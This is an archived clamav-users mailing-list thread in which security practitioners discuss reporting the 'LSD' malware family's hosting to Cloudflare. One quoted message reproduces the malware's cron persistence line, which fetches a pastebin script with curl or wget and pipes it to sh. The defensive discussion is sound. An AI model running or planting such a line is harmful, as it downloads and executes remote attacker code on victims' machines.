[clamav-users] LSD Malwares
Xavier Maysonnave
x.maysonnave at gmail.com
Sat Apr 27 05:00:12 UTC 2019
Hi Joel,
Thanks for your action.
I also open a request @ Cloudflare.
*https://support.cloudflare.com/hc/requests/1677155
<https://support.cloudflare.com/hc/requests/1677155>*
This ticket is not public though but it could be useful to forward its
reference to your Cloudflare contact.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
Le ven. 26 avr. 2019 à 22:18, Joel Esler (jesler) <jesler at cisco.com> a
écrit :
> Dear ClamAV-users,
>
> I reached out to my contacts at Cloudflare to take action.
>
>
> --
> Joel Esler
> Manager, Communities Division
> Cisco Talos Intelligence Group
> http://www.talosintelligence.com
>
> On Apr 25, 2019, at 11:25 PM, Xavier Maysonnave via clamav-users <
> clamav-users at lists.clamav.net> wrote:
>
> Hi All,
>
> Thanks for your feedback.
> I'm going to report to Cloudflare this URL.
>
> However keep in mind that there are other URLs who are involved in this
> family.
> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
> https://pastebin.com/raw/wR3ETdbi)|sh
> This one targets Jenkins, another popular OpenSource tool, not used on our
> infrastructure though.
>
> I'm still very interested with the consequences of this malwares. Any
> hints will be greatly appreciated.
>
> Thanks.
>
> Light
>
> Pudhuveedu / Xavier
>
> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>
>
> Le ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <
> clamav-users at lists.clamav.net> a écrit :
>
>> The same applies: Report it. Cloudflare will either forward the
>> complaint for you, or block the offending URL (or both).
>>
>> On 2019-04-25 19:16, Dennis Peterson wrote:
>> > That domain is hosted on a cloudflare IP block. They're become part of
>> > the problem.
>> >
>> > dp
>> >
>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>> >> hosting provider & domain registrar that they are hosting malware and
>> >> get that site shut down...
>> >>
>>
>> _______________________________________________
>>
>> clamav-users mailing list
>> clamav-users at lists.clamav.net
>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>
>>
>> Help us build a comprehensive ClamAV guide:
>> https://github.com/vrtadmin/clamav-faq
>>
>> http://www.clamav.net/contact.html#ml
>>
>
> _______________________________________________
>
> clamav-users mailing list
> clamav-users at lists.clamav.net
> https://lists.clamav.net/mailman/listinfo/clamav-users
>
>
> Help us build a comprehensive ClamAV guide:
> https://github.com/vrtadmin/clamav-faq
>
> http://www.clamav.net/contact.html#ml
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.clamav.net/pipermail/clamav-users/attachments/20190427/7dd18842/attachment.htm>
More information about the clamav-users
mailing list